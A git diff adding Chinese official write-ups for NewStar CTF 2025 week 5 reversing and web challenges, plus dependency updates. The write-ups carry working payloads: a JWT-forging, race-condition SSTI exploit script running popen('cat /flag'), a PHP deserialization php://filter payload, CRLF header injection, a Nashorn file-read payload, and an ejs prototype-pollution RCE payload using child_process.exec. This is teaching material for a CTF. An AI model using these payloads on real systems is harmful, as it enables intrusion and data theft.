pr(_this, idx) { + init(_this.context); + let objPtr = getArg(_this.context, idx); + const [tptr, cls, values] = getTaggedObjectValue(objPtr); + console.log(`${cls.name}@${tptr.toString().slice(2)} =`, JSON.stringify(values, null, 2)); +} + +function onLibappLoaded() { + // xxx("remove this line and correct the hook value"); + const fn_addr = 0x1d58b8; + Interceptor.attach(libapp.add(fn_addr), { + onEnter: function (args) { + pr(this, 0); + pr(this, 1); + }, + }); +} + +function tryLoadLibapp() { + try { + libapp = Module.findBaseAddress("libapp.so"); + } catch (e) { + if (e instanceof TypeError && e.message === "not a function") { + libapp = Process.findModuleByName("libapp.so"); + if (libapp != null) { + libapp = libapp.base; + } + } else { + throw e; + } + } + if (libapp === null) setTimeout(tryLoadLibapp, 500); + else onLibappLoaded(); +} +tryLoadLibapp(); +// more is being skipped +``` + +这次 `hook` 的输出很多,但是我找到了加密后的输入,另一个参数应该就是密文。 + +```js +// more text +_Uint8List@6e005e5671 = [ + 134, + 139, + 225, + 194, + 10, + 134, + 7, + 131, + 88, + 191, + 107, + 222, + 52, + 133, + 87, + 112, + 194, + 148, + 71, + 228, + 191, + 70, + 1, + 147, + 123, + 52, + 228, + 254, + 20, + 111, + 81, + 245, + 110, + 92, + 93, + 159, + 129, + 240, + 231, + 205 +] +_Uint8List@6e006438b9 = [ + 96, + 18, + 149, + 29, + 143, + 171, + 169, + 183 +] +// more text +``` + +对这个密文进行解密操作。 + +```cpp +#include +#define DELTA 0x114514 +#define MX (((z >> 5 ^ y << 2) + (y >> 3 ^ z << 4)) ^ ((sum ^ y) + (key[(p & 3) ^ e] ^ z))) +// 容易魔改 +void btea(uint32_t *v, int n, uint32_t const key[4]) +{ + // v 为数据,n 为数据长度 (负时为解密),key 为密钥 + uint32_t y, z, sum; + unsigned p, rounds, e; + if (n > 1) + /* Coding Part */ + { + rounds = 6 + 52 / n; + sum = 0; + z = v[n - 1]; + do + { + sum += DELTA; + e = (sum >> 2) & 3; + for (p = 0; p < n - 1; p++) + { + y = v[p + 1]; + z = v[p] += MX; + } + y = v[0]; + z = v[n - 1] += MX; + } while (--rounds); + } + else if (n < -1) + /* Decoding Part */ + { + n = -n; + rounds = 6 + 52 / n; + sum = rounds * DELTA; + y = v[0]; + do + { + e = (sum >> 2) & 3; + for (p = n - 1; p > 0; p--) + { + z = v[p - 1]; + y = v[p] -= MX; + } + z = v[n - 1]; + y = v[0] -= MX; + sum -= DELTA; + } while (--rounds); + } +} +unsigned char keys[] = "ThisIsaKeywowowo"; +unsigned char mm[] = {134,139,225,194,10,134,7,131,88,191,107,222,52,133,87,112,194,148,71,228,191,70,1,147,123,52,228,254,20,111,81,245,110,92,93,159,129,240,231,205}; +int main() +{ + btea((uint32_t *)mm, -10, (uint32_t *)keys); + unsigned char *p = mm; + for (size_t i = 0; i < 40; i++) + { + printf("%c", p[i]); + } + + return 0; +} + +``` + +如果想深入思考本题请参考 [Want2BecomeMagicalGirl2025](https://pangbai.work/CTF/Reverse/Want2BecomeMagicalGirl/) diff --git a/docs/wp/2025/week5/web/abandoned-site.md b/docs/wp/2025/week5/web/abandoned-site.md new file mode 100644 index 0000000..a752e62 --- /dev/null +++ b/docs/wp/2025/week5/web/abandoned-site.md @@ -0,0 +1,132 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + +# 废弃的网站 + +首先我们对后端代码进行审计,发现了一个隐藏的 `/admin` 路由,其中包含了一个非常基础的 SSTI 漏洞。 + +```python +@app.route("/admin", methods=['GET']) +@admin_required +def admin_panel(): + global tempuser + # 明显的 SSTI。 + return render_template_string("Welcome Back, %s" % tempuser['name']) +``` + +如果你仍不知道 SSTI 是什么,可以去看看第三周的 [whossti](/wp/2025/week3/web/whossti) 以学习这方面知识点。 + +接下来的难点在于如何抵达这个漏洞点以及如何控制这里的 `tempuser['name']`,可以在源码的第 42 行看到后端处理了这个 `tempuser` 变量,并且在后面为他赋值。 + +那么我们只需要控制这里的 session 就可以控制 `tempuser` 的具体值了。session 是使用 JWT 进行加密的,在后端源码的最开头存在一个 JWT 密钥的生成方式:直接利用系统启动时间进行加密运算后生成。 + +继续观察源码第 33 行,存在这样一行代码: + +```python +except jwt.InvalidTokenError: + abort(401, description = f"Session expired. Please in again. System has been running {round(time.time(time_started)} seconds.") [!code focus] +return f(*args, **kwargs) +``` + +直接向我们表明了当前系统已经运行的时间,我们直接通过当前时间减去这个时间即可。为了防止精度上存在的问题,特地使用了 `round` 函数来避免误差。 + +但是在 `admin_required` 函数中表明了当前 `user_data['name']` 只能是 `Administrator`。不过由于 `tempuser` 是全局属性,我们就可以用**条件竞争**的手法来绕过这个限制。 + +对于全局性的,需要维持的信息而言,非常容易出现**条件竞争**漏洞。这里的 `tempuser` 就是例子。 + +我们仔细梳理整个请求进行的时间线。首先我们发包,然后按照下面的流程进行数据处理: + +1. 执行 `app.before_request` 中的 `load_user` 函数,在这个函数中我们修改了 `tempuser` 的具体值。 +2. 再执行 `admin_required` 函数,对我们的身份进行认证。 +3. 然后在 `admin_panel` 函数中输出我们当前的 `tempuser['name']` 的具体值。 + +我们现在要绕过第二步的认证,那么可以采取如下竞争方式(一图流): + +![一图流](/assets/images/wp/2025/week5/abandoned-site_1.png) + +如此便可以获取我们的 SSTI 结果了。 + +下面是整个流程的 EXP: + +```python +import requests, re + +url = "http://your-site/" + +import jwt, hashlib, time + +def get_secret(): + response = requests.get(url, cookies={"session": "123"}) + print(response.text) + if response.status_code == 401: + Tim = round(time.time()) - int(response.text.split("running ")[1].split(" seconds")[0]) + return Tim + return None + + + +def hash_code(x): + return hashlib.sha256(str(x).encode()).hexdigest() + +APP_SECRET = get_secret() +print(f"APP_SECRET: {hash_code(APP_SECRET)}") + + +def test_secret(Tim): + cookies = { + 'session': jwt.encode({"id": 1, "role": "admin", "name": "Administrator"}, hash_code(Tim), algorithm='HS256') + } + response = requests.get(url + 'admin', cookies=cookies) + Tim = re.search(r"System has been running (\d+) seconds.", response.text) + if Tim: return False + else: return True + +for i in range(-10, 10): + Tim_try = APP_SECRET + i + if test_secret(Tim_try): + print(f"Found time_started: {Tim_try}") + APP_SECRET = hash_code(Tim_try) + break +print(f"Final APP_SECRET: {APP_SECRET}") + +payload = "{{config.__class__.__init__.__globals__['__builtins__']['eval']('__import__(\"os\").popen(\"cat /flag\").read()')}}" + +print(f'session={jwt.encode({"id": 1, "role": "admin", "name": "Administrator"}, APP_SECRET, algorithm="HS256")}') +print('Exploit payload session='+jwt.encode({"id": 1, "role": "admin", "name": payload}, APP_SECRET, algorithm="HS256")) + +# exit(0) + +cookies = { + 'session': jwt.encode({"id": 1, "role": "admin", "name": "Administrator"}, APP_SECRET, algorithm='HS256') +} + +exp_cookies = { + 'session': jwt.encode({"id": 1, "role": "admin", "name": f"{payload}"}, APP_SECRET, algorithm='HS256') +} + + +def send_requests(cookies, times): + for _ in range(times): + res = requests.get(url + "admin", cookies=cookies) + if res.status_code == 200: + if "Administrator" not in res.text: + print("Exploit successful!") + print(res.text) + exit(0) + +# 双线程 +import threading +def attack(): + threads = [] + for _ in range(10): + t = threading.Thread(target=send_requests, args=(cookies, 2)) + t.start() + threads.append(t) + t = threading.Thread(target=send_requests, args=(exp_cookies, 5)) + t.start() + threads.append(t) + for t in threads: + t.join() +attack() +``` diff --git a/docs/wp/2025/week5/web/binary-blog.md b/docs/wp/2025/week5/web/binary-blog.md new file mode 100644 index 0000000..fd9e54a --- /dev/null +++ b/docs/wp/2025/week5/web/binary-blog.md @@ -0,0 +1,79 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + +# Binary Blog + +首先我们先注册一个用户去看看其整体框架 + +同时用 dirsearch 去扫一下 + +![Dirsearch 发现 flag.php](/assets/images/wp/2025/week5/binary-blog_1.png) + +这里看到 `flag.php` 文件,推测 FLAG 应该就在其中。 + +然后我们在主页中看到 admin 账户 + +![主页发现 admin 账户](/assets/images/wp/2025/week5/binary-blog_2.png) + +但是强制爆破没成功,推测可能需要提权或者越权 + +![爆破 admin 登录失败](/assets/images/wp/2025/week5/binary-blog_3.png) + +接着我们在个人信息中抓到这个包,然后尝试修改 + +这里我们发现从修改 id 和 name 都无法修改成为 admin 用户 + +接着我们尝试从另一个入口(修改密码)处如何看看 + +![修改密码接口请求](/assets/images/wp/2025/week5/binary-blog_4.png) + +发现这个和上面的情况不一样,尝试修改 username 为 admin 试试 + +![修改 admin 用户密码](/assets/images/wp/2025/week5/binary-blog_5.png) + +可以发现用户 admin 密码成功修改成 123456q 了 + +之后尝试登录 admin:123456q + +![登录 admin 用户](/assets/images/wp/2025/week5/binary-blog_6.png) + +成功登录,接着我们继续看看其接口情况 + +![管理员接口页面](/assets/images/wp/2025/week5/binary-blog_7.png) + +然后我们在博客管理界面发现能够上传文件,推测是文件上传漏洞,同时还有导出功能,先导出下来看看情况 + +![博客导出功能](/assets/images/wp/2025/week5/binary-blog_8.png) + +这里我们发现这不是反序列内容嘛,大概率这题就是反序列了,而不是文件上传。 + +同时我们在 + +![页面提示信息](/assets/images/wp/2025/week5/binary-blog_9.png) + +![发现 PHP 文件](/assets/images/wp/2025/week5/binary-blog_10.png) + +这里发现一个 PHP 文件,同时在页面中也有个迷惑的提示,于是我们可以尝试写入 `flag.php` 文件,发现没有成功,于是我们尝试其他方法——构造伪协议 + +根据反序列构造 payload + +```php +a:4:{s:9:"timestamp";i:1759054823;s:7:"version";s:3:"1.0";s:4:"blog";O:4:"Blog":8:{s:2:"id";i:1;s:5:"title";s:24:"欢迎使用博客系统";s:7:"content";s:280:"这是一个功能完整的博客系统,您可以在这里发布、编辑和管理您的博客内容。 + +系统特点: +- 支持用户注册和登录 +- 管理员可以管理所有用户和博客 +- 支持富文本编辑 +- 响应式设计,适配各种设备 + +开始使用吧!";s:7:"user_id";i:1;s:8:"username";s:5:"admin";s:10:"created_at";s:19:"2025-09-28 18:02:36";s:10:"updated_at";s:19:"2025-09-28 18:02:36";s:8:"template";s:57:"php://filter/read=convert.base64-encode/resource=flag.php";}s:9:"signature";s:64:"231d1e254f4cdd5ac689fbac0fb0b2722cbcc2fcc3a13d7b0203ca674f1a46a8";} +``` + +修改 template 为 `php://filter/read=convert.base64-encode/resource=flag.php` 来泄露 `flag.php` 的源码 + +得到 FLAG。 + +![读取 flag.php 源码](/assets/images/wp/2025/week5/binary-blog_11.png) + +![获得 FLAG](/assets/images/wp/2025/week5/binary-blog_12.png) diff --git a/docs/wp/2025/week5/web/broken-ai.md b/docs/wp/2025/week5/web/broken-ai.md new file mode 100644 index 0000000..7335f9b --- /dev/null +++ b/docs/wp/2025/week5/web/broken-ai.md @@ -0,0 +1,59 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + +# 被玩坏的 AI + +## 信息搜集 + +dirsearch 扫描发现有个 `robots.txt` 文件,内容如下 + +```plaintext +User-agent: * +Allow: /find.php + +Disallow: /RPO/ + +``` + +访问 `find.php`,控制台提示: + +这里可没有,你想要的password,试着找找是不是在其他的find.php中? + +访问 `/RPO/`,没有返回有效数据,但是经过搜索,RPO 是一种漏洞的名称。 + +> 这种漏洞全称为 Relative Path Overwrite, 漏洞存在的核心是关于服务器和客户端的解析差异,我们很早之前就知道对于锚点所可能造成的安全问题, +> 比如在挖掘 SSRF 相关漏洞如果在后台简单的判断后缀必须为 .png 我们可以通过 #.png 来达到一个成功访问的 bypass. +> 首先 RPO 存在的条件为开启了URL重写之后,当我们这样访问 /index.php/1234 网站时,服务器角度会把子元素识别为参数, +> 而浏览器其实是无法分辨哪一部分是参数,整个路径都会被识别为一个路径。 +> (引用来源:) + +我们经过多次尝试,得出正确 payload + +`/RPO/..%2ffind.php` + +这里利用了浏览器将 `..%2ffind.php` 识别为路径,而服务器却将 `%2f` 重写为 `/`,从而达成了 LFI 获得了正确的路径。 + +在控制台我们得到:`🤖 哔......系统消息: yours password:@pwdisadmin` + +## 利用 + +我们回到主页输入密码,发现问题还没有解决, + +`不过,要拿到真正的 flag 还需要 Admin 。` + +通过随便输入发现这个要高权限 Admin,同时也以机器人口吻,介绍了它名为 X,这里算是个提示需要用 X 自定义标签 + +然后在网页源码中还有个提示 + +`// Hint: Admin is Admin only,but Are you Admin?` + +也就是说,想要得到 FLAG,就需要满足 `X-Admin\:Admin`。 + +通过输入 + +```plaintext +TestUA%0d%0aX-Admin: Admin +``` + +进行 CRLF 注入得到 FLAG。 diff --git a/docs/wp/2025/week5/web/familiar-calc.md b/docs/wp/2025/week5/web/familiar-calc.md new file mode 100644 index 0000000..6ffa3d0 --- /dev/null +++ b/docs/wp/2025/week5/web/familiar-calc.md @@ -0,0 +1,53 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + +# 眼熟的计算器 + +## 初步审计 + +对于 CTF 中的白盒 JAVA 题目,一般有两种出题手法,第一种是直接给一个 jar 包,另一种是给一个 tomcat 的 war 包,分别对应了两种不同的做题思路,这里只讲如何处理 jar 包的形式。 + +一般而言,题目给的 jar 包都是以 spring 为框架的 JAVA 后端程序,如果你安装了 IDEA,那么可以通过导入依赖的形式来简单的反编译出源码,然后进行审计。 + +一般而言,我们需要首先查看该程序的依赖,一般存放在 `/META-INF/maven/xxx/xxx/pom.xml` 这个文件中,通过审计这个文件我们可以完整的得知整个 jar 包的依赖和版本情况,这一点与 NodeJS 后端审计是非常相似的。 + +但是本题中并没有考查依赖相关的事项,我们可以直接去到源码处查看。 + +一般而言,源码存放在 `/BOOT-INF/classes` 文件目录下,由于是编译过后的 `.class` 文件,我们需要使用反编译器进行反编译操作,一般的 JAVA 编辑器都可以胜任这个工作。(如果你还会一点安卓的话,你也可以使用 jadx 完成上述操作) + +本题的源码存在这样一个函数: + +```java +private String[] BLACKLIST = new String[]{"import", "java.lang.Runtime", "new"}; +private String calculate(String content) throws Exception { + String[] var2 = this.BLACKLIST; + int var3 = var2.length; + for(int var4 = 0; var4 < var3; ++var4) { + String word = var2[var4]; + if (content.contains(word)) { + return "Blacklisted word detected: " + word; + } + } + Object result = (new ScriptEngineManager()).getEngineByName("js").eval(content); + return result.toString(); +} +``` + +我们只需要去理解这里的代码做了一个什么操作就行。 + +他将我们输入的 `content` 进行了黑名单的过滤,然后使用 `ScrEngineManager` 对象,使用 `js` 类型来进行处理,并且将结果输出出来。 + +## 漏洞利用 + +其实这个漏洞利用起来非常简单,无比类似于之前大家做过的 jail 题目,只是环境从 python 换到了 JAVA 而已,通过本地的尝试,我们可以给出这样一个 payload: + +```js +var Files = Java.type("java.nio.file.Files"); +var Paths = Java.type("java.nio.file.Paths"); +var Lines = Files.readAllLines(Paths.get("/flag")); +var String = Java.type("java.lang.String"); +String.join("\n", Lines); +``` + +JAVA 中也有很多有意思的这种类型的 jail 可以出的更加有意思,期待各位未来的创造力。 diff --git a/docs/wp/2025/week5/web/w-k-story-final.md b/docs/wp/2025/week5/web/w-k-story-final.md new file mode 100644 index 0000000..f6413c4 --- /dev/null +++ b/docs/wp/2025/week5/web/w-k-story-final.md @@ -0,0 +1,38 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + +# 小 W 和小 K 的故事(最终章) + +## 初步审计 + +在 CTF 中遇到 NodeJS 相关题目有很多固定的起始套路,我们一般可以根据这些套路先对环境进行初步的处理。 + +第一步为查看环境状态,众所周知,NodeJS 后端基本上是由一个个组件作为基础支撑搭建起来的,组件漏洞或者说供应链漏洞是非常常见的漏洞类型之一,在下发的 `src` 中,存在一个名为 `package.json` 的文件,这个文件中表明了该后端服务所使用的组件以及其版本。我们可以针对性的对这些组件进行搜索,如果其格式如 `"express": "^5.1.0"`,表明会自动拉取该组件**最新**的版本,如果没有 `^`,那么就会拉取一个**精确**的版本。 + +在本题中,这个知识点表现在 ejs 组件和 lodash 组件拉取的并不是最新版本,我们可以上网搜索这些组件该版本下是否存在漏洞。 + +通过搜索可以得到两个结果,分别是 CVE-2019-10744 和 CVE-2022-29078。通过这两个 CVE,我们再来完成这道题目,就轻而易举了。 + +## 漏洞利用。 + +首先,我们可以通过 `/addUser` 路由来进行任意的原型链污染操作,然后根据 CVE-2022-29078,由于 ejs 在进行模板渲染的时候,`outputFunctionName` 成员默认为空,所以直接用原型链污染为他赋值,然后植入我们的恶意代码就可以了。 + +最终 payload: + +```json +{ + "content": { + "constructor": { + "prototype": { + "outputFunctionName": "_tmp1;global.process.mainModule.require('child_process').exec('RCE code');var __tmp2" + } + } + }, + "type": "test" +} +``` + +然后反复访问页面即可。 + +由于是无回显 RCE,所以你需要反弹 shell。但是因为镜像的原因,你需要使用 nc 来进行反弹 shell,具体操作留给读者自查。 diff --git a/docs/wp/index.md b/docs/wp/index.md index 7314086..b336cd4 100644 --- a/docs/wp/index.md +++ b/docs/wp/index.md @@ -9,6 +9,8 @@ hero: tagline: 赛事官方题解和解题思路 features: + - title: NewStar CTF 2025 官方 WriteUp + link: /wp/2025/ - title: NewStar CTF 2024 官方 WriteUp # details: '2024.9.27 - 2024.11.3' link: /wp/2024/ diff --git a/package.json b/package.json index 848fa98..2bb4a32 100644 --- a/package.json +++ b/package.json @@ -7,30 +7,30 @@ "docs:dev": "nodemon -w theme-config.yml -x vitepress dev", "docs:build": "vitepress build", "docs:preview": "vitepress preview", - "format": "biome check --write . --log-level info && prettier --write .", + "format": "biome check --write . --log-level error && prettier --write .", "lint": "biome check . && prettier --check ." }, "peerDependencies": { - "typescript": "^5.0.0" + "typescript": "^6.0.3" }, "devDependencies": { - "@biomejs/biome": "^1.9.4", + "@biomejs/biome": "^2.5.2", "@giscus/vue": "^3.1.1", "@types/bun": "latest", - "@types/node": "^22.19.7", - "@vueuse/core": "^11.3.0", - "element-plus": "^2.13.1", - "markdown-it-mathjax3": "^4.3.2", - "nodemon": "^3.1.11", + "@types/node": "^26.1.0", + "@vueuse/core": "^14.3.0", + "element-plus": "^2.14.2", + "markdown-it-mathjax3": "^5.2.0", + "nodemon": "^3.1.14", "prettier": "3.5.2", - "sass": "~1.76.0", - "unplugin-element-plus": "^0.8.0", - "vite": "^5.4.21", - "vite-svg-loader": "^5.1.0", + "sass": "~1.101.0", + "unplugin-element-plus": "^0.11.2", + "vite": "^8.1.3", + "vite-svg-loader": "^5.1.1", "vitepress": "^1.6.4", - "vue": "^3.5.27", - "vue-tsc": "^2.2.12", - "yaml": "^2.8.2" + "vue": "^3.5.39", + "vue-tsc": "^3.3.6", + "yaml": "^2.9.0" }, "packageManager": "pnpm@10.11.0+sha512.6540583f41cc5f628eb3d9773ecee802f4f9ef9923cc45b69890fb47991d4b092964694ec3a4f738a420c918a333062c8b925d312f42e4f0c263eb603551f977" } diff --git a/pnpm-lock.yaml b/pnpm-lock.yaml index 0954c98..0cd4022 100644 --- a/pnpm-lock.yaml +++ b/pnpm-lock.yaml @@ -9,65 +9,65 @@ importers: .: dependencies: typescript: - specifier: ^5.0.0 - version: 5.9.3 + specifier: ^6.0.3 + version: 6.0.3 devDependencies: '@biomejs/biome': - specifier: ^1.9.4 - version: 1.9.4 + specifier: ^2.5.2 + version: 2.5.2 '@giscus/vue': specifier: ^3.1.1 - version: 3.1.1(vue@3.5.29(typescript@5.9.3)) + version: 3.1.1(vue@3.5.39(typescript@6.0.3)) '@types/bun': specifier: latest - version: 1.3.10 + version: 1.3.14 '@types/node': - specifier: ^22.19.7 - version: 22.19.13 + specifier: ^26.1.0 + version: 26.1.0 '@vueuse/core': - specifier: ^11.3.0 - version: 11.3.0(vue@3.5.29(typescript@5.9.3)) + specifier: ^14.3.0 + version: 14.3.0(vue@3.5.39(typescript@6.0.3)) element-plus: - specifier: ^2.13.1 - version: 2.13.3(vue@3.5.29(typescript@5.9.3)) + specifier: ^2.14.2 + version: 2.14.2(vue@3.5.39(typescript@6.0.3)) markdown-it-mathjax3: - specifier: ^4.3.2 - version: 4.3.2 + specifier: ^5.2.0 + version: 5.2.0 nodemon: - specifier: ^3.1.11 + specifier: ^3.1.14 version: 3.1.14 prettier: specifier: 3.5.2 version: 3.5.2 sass: - specifier: ~1.76.0 - version: 1.76.0 + specifier: ~1.101.0 + version: 1.101.0 unplugin-element-plus: - specifier: ^0.8.0 - version: 0.8.0(rollup@4.59.0) + specifier: ^0.11.2 + version: 0.11.2 vite: - specifier: ^5.4.21 - version: 5.4.21(@types/node@22.19.13)(sass@1.76.0) + specifier: ^8.1.3 + version: 8.1.3(@types/node@26.1.0)(jiti@2.7.0)(sass@1.101.0)(yaml@2.9.0) vite-svg-loader: - specifier: ^5.1.0 - version: 5.1.0(vue@3.5.29(typescript@5.9.3)) + specifier: ^5.1.1 + version: 5.1.1(vue@3.5.39(typescript@6.0.3)) vitepress: specifier: ^1.6.4 - version: 1.6.4(@algolia/client-search@5.47.0)(@types/node@22.19.13)(async-validator@4.2.5)(markdown-it-mathjax3@4.3.2)(postcss@8.5.6)(sass@1.76.0)(search-insights@2.15.0)(typescript@5.9.3) + version: 1.6.4(@algolia/client-search@5.55.1)(@types/node@26.1.0)(async-validator@4.2.5)(lightningcss@1.32.0)(markdown-it-mathjax3@5.2.0)(postcss@8.5.16)(sass@1.101.0)(search-insights@2.15.0)(typescript@6.0.3) vue: - specifier: ^3.5.27 - version: 3.5.29(typescript@5.9.3) + specifier: ^3.5.39 + version: 3.5.39(typescript@6.0.3) vue-tsc: - specifier: ^2.2.12 - version: 2.2.12(typescript@5.9.3) + specifier: ^3.3.6 + version: 3.3.6(typescript@6.0.3) yaml: - specifier: ^2.8.2 - version: 2.8.2 + specifier: ^2.9.0 + version: 2.9.0 packages: - '@algolia/abtesting@1.13.0': - resolution: {integrity: sha512-Zrqam12iorp3FjiKMXSTpedGYznZ3hTEOAr2oCxI8tbF8bS1kQHClyDYNq/eV0ewMNLyFkgZVWjaS+8spsOYiQ==} + '@algolia/abtesting@1.21.1': + resolution: {integrity: sha512-Wia5/mNTfiU0PIUN25UMfAGGdASkkwuCS9nBAdmhqrNPY/ff7U/6MgBVdwFDPsa3sA1msutPtO50gvOzx6MOXA==} engines: {node: '>= 14.0.0'} '@algolia/autocomplete-core@1.17.7': @@ -90,131 +90,135 @@ packages: '@algolia/client-search': '>= 4.9.1 < 6' algoliasearch: '>= 4.9.1 < 6' - '@algolia/client-abtesting@5.47.0': - resolution: {integrity: sha512-aOpsdlgS9xTEvz47+nXmw8m0NtUiQbvGWNuSEb7fA46iPL5FxOmOUZkh8PREBJpZ0/H8fclSc7BMJCVr+Dn72w==} + '@algolia/client-abtesting@5.55.1': + resolution: {integrity: sha512-miW8RzAtBgNiEJ9fGEhsOPgWUpekAe64YcVufqXrlykj0Jjmo5nj0a5f/HAzRVX5ZuU1GAVd7BkzFDx7q50P3A==} engines: {node: '>= 14.0.0'} - '@algolia/client-analytics@5.47.0': - resolution: {integrity: sha512-EcF4w7IvIk1sowrO7Pdy4Ako7x/S8+nuCgdk6En+u5jsaNQM4rTT09zjBPA+WQphXkA2mLrsMwge96rf6i7Mow==} + '@algolia/client-analytics@5.55.1': + resolution: {integrity: sha512-eR3J3kB9JX6DdCvDRi3I4KPfwO6fR9HWYRXhVke2TXIoOQafMKCRAneg33JRmIrb+DnnJ/eWApJLF1O1CLPERg==} engines: {node: '>= 14.0.0'} - '@algolia/client-common@5.47.0': - resolution: {integrity: sha512-Wzg5Me2FqgRDj0lFuPWFK05UOWccSMsIBL2YqmTmaOzxVlLZ+oUqvKbsUSOE5ud8Fo1JU7JyiLmEXBtgDKzTwg==} + '@algolia/client-common@5.55.1': + resolution: {integrity: sha512-P5ak7EurwYqgAiDyb95mgA3WRR/Zu8CPMv36lWTISvL2AmlPyqQPy2nX/KEJRTcwaeTWwrk6wJV4/M93GfjOWw==} engines: {node: '>= 14.0.0'} - '@algolia/client-insights@5.47.0': - resolution: {integrity: sha512-Ci+cn/FDIsDxSKMRBEiyKrqybblbk8xugo6ujDN1GSTv9RIZxwxqZYuHfdLnLEwLlX7GB8pqVyqrUSlRnR+sJA==} + '@algolia/client-insights@5.55.1': + resolution: {integrity: sha512-OVtj9uA//+pjvKQI5INnzbyLrf3ClNv3XRbWswwJ2kHIStQNHtBfHo+LofNB/WhM9xjuXlW5ANn2aMj65UGx7w==} engines: {node: '>= 14.0.0'} - '@algolia/client-personalization@5.47.0': - resolution: {integrity: sha512-gsLnHPZmWcX0T3IigkDL2imCNtsQ7dR5xfnwiFsb+uTHCuYQt+IwSNjsd8tok6HLGLzZrliSaXtB5mfGBtYZvQ==} + '@algolia/client-personalization@5.55.1': + resolution: {integrity: sha512-oKlVFlp+qbIEe4p7E54zSiP2gEV/vDu972Ykv8VDMFwEvreS7m0YKA3a8hGGHwc7yiBUGGiR3LlwzMLfnJmy6Q==} engines: {node: '>= 14.0.0'} - '@algolia/client-query-suggestions@5.47.0': - resolution: {integrity: sha512-PDOw0s8WSlR2fWFjPQldEpmm/gAoUgLigvC3k/jCSi/DzigdGX6RdC0Gh1RR1P8Cbk5KOWYDuL3TNzdYwkfDyA==} + '@algolia/client-query-suggestions@5.55.1': + resolution: {integrity: sha512-BOVrld6vdtsFmotVDMTVQfYXwrVplJ+DUvy60JFi+tkWV698q2J9NNPKEO3dr5qxtSLKQP4vHF8n+3U5PDWhOQ==} engines: {node: '>= 14.0.0'} - '@algolia/client-search@5.47.0': - resolution: {integrity: sha512-b5hlU69CuhnS2Rqgsz7uSW0t4VqrLMLTPbUpEl0QVz56rsSwr1Sugyogrjb493sWDA+XU1FU5m9eB8uH7MoI0g==} + '@algolia/client-search@5.55.1': + resolution: {integrity: sha512-GAqHl9zERhC3bbBfubwUu07G3UXO06gORvOcsiTBZB3et0s3auNUbHlYdYNp4VKa3sUZqH5AcD3OKzU/KDGXjQ==} engines: {node: '>= 14.0.0'} - '@algolia/ingestion@1.47.0': - resolution: {integrity: sha512-WvwwXp5+LqIGISK3zHRApLT1xkuEk320/EGeD7uYy+K8WwDd5OjXnhjuXRhYr1685KnkvWkq1rQ/ihCJjOfHpQ==} + '@algolia/ingestion@1.55.1': + resolution: {integrity: sha512-BXZw+C+gsWL7pZvbnhJUnCXASiDLGcQxVV7h55Pyh2DmSzwdZIVccE5xc9RVD2trtrhIqk5smuODTxtaZqd0IA==} engines: {node: '>= 14.0.0'} - '@algolia/monitoring@1.47.0': - resolution: {integrity: sha512-j2EUFKAlzM0TE4GRfkDE3IDfkVeJdcbBANWzK16Tb3RHz87WuDfQ9oeEW6XiRE1/bEkq2xf4MvZesvSeQrZRDA==} + '@algolia/monitoring@1.55.1': + resolution: {integrity: sha512-9g/ceZrZTqA62FA3588Xj0onRPjDNfu0pVQqefK0rrHp9H6Wblph/YmzGjZ2g8uqbTh0ZGIvAGCzErU8f7MHpA==} engines: {node: '>= 14.0.0'} - '@algolia/recommend@5.47.0': - resolution: {integrity: sha512-+kTSE4aQ1ARj2feXyN+DMq0CIDHJwZw1kpxIunedkmpWUg8k3TzFwWsMCzJVkF2nu1UcFbl7xsIURz3Q3XwOXA==} + '@algolia/recommend@5.55.1': + resolution: {integrity: sha512-cZTIrGyAP+W4A6jDVwvWM/JOaoJKQkD/2a5eLUEeNdKAD45jN7BCpsMDONyhZlosLa4UwL8uiINQzj4iFy9nqg==} engines: {node: '>= 14.0.0'} - '@algolia/requester-browser-xhr@5.47.0': - resolution: {integrity: sha512-Ja+zPoeSA2SDowPwCNRbm5Q2mzDvVV8oqxCQ4m6SNmbKmPlCfe30zPfrt9ho3kBHnsg37pGucwOedRIOIklCHw==} + '@algolia/requester-browser-xhr@5.55.1': + resolution: {integrity: sha512-N6I3leW0UO8Y9Zv90yo2UHgYGuxZO0mjbvzNxDIJDjO0qECEF7Z9XMvSNeUWXQh/iNDA9lr8MfEy3rmZGIcclw==} engines: {node: '>= 14.0.0'} - '@algolia/requester-fetch@5.47.0': - resolution: {integrity: sha512-N6nOvLbaR4Ge+oVm7T4W/ea1PqcSbsHR4O58FJ31XtZjFPtOyxmnhgCmGCzP9hsJI6+x0yxJjkW5BMK/XI8OvA==} + '@algolia/requester-fetch@5.55.1': + resolution: {integrity: sha512-ukU5zeeFs44rQkzv+TRdYard+d+3lmPGs8lPZhHtWE8rfz+LlBSF6s9kP3VQ7LeOYL8Dz0u6tZfnyTrqrumbHQ==} engines: {node: '>= 14.0.0'} - '@algolia/requester-node-http@5.47.0': - resolution: {integrity: sha512-z1oyLq5/UVkohVXNDEY70mJbT/sv/t6HYtCvCwNrOri6pxBJDomP9R83KOlwcat+xqBQEdJHjbrPh36f1avmZA==} + '@algolia/requester-node-http@5.55.1': + resolution: {integrity: sha512-lCwXyijwPm3vbYHpBXPRomMcD6mgiptmps27gnMCf4HK+u/AOeFPBnIFh4V3l4A5SnP9VRiKBZqwGBpUH0vaTg==} engines: {node: '>= 14.0.0'} - '@babel/helper-string-parser@7.27.1': - resolution: {integrity: sha512-qMlSxKbpRlAridDExk92nSobyDdpPijUq2DW6oDnUqd0iOGxmQjyqhMIihI9+zv4LPyZdRje2cavWPbCbWm3eA==} + '@babel/helper-string-parser@7.29.7': + resolution: {integrity: sha512-Pb5ijPrZ89GDH8223L4UP8i6QApWxs04RbPQJTeWDV0/keR2E36MeKnyr6LYmUUvqRRI+Iv87SuF1W6ErINzYw==} engines: {node: '>=6.9.0'} - '@babel/helper-validator-identifier@7.28.5': - resolution: {integrity: sha512-qSs4ifwzKJSV39ucNjsvc6WVHs6b7S03sOh2OcHF9UHfVPqWWALUsNUVzhSBiItjRZoLHx7nIarVjqKVusUZ1Q==} + '@babel/helper-validator-identifier@7.29.7': + resolution: {integrity: sha512-qehxGkRj55h/ff8EMaJ+cYhyaKlHIxqYDn682wQD7RNp9UujOQsHog2uS0r2vzr4pW+sXf90NeeayjcNaX3fFg==} engines: {node: '>=6.9.0'} - '@babel/parser@7.29.0': - resolution: {integrity: 